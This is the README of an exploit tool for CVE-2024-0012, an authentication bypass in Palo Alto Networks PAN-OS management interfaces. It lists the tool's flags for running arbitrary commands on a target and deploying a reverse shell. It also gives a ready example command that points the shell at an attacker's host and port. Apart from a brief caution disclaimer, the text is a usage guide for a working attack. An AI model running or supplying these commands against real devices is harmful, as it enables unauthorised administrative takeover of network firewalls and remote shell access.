CVE-2024-0012 an authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities.
| ❗ Disclaimer |
|---|
| This project is primarily built to be used as a standalone CLI tool. Running this exploit as a service may pose security risks. It's recommended to use with caution and additional security measures. DWYOR |
python3 cve-2024-0012.py -h
This will display help for the tool. Here are all the switches it supports.
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)Reverse Shell Command.
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444
- Replace 4444 with the port you are using.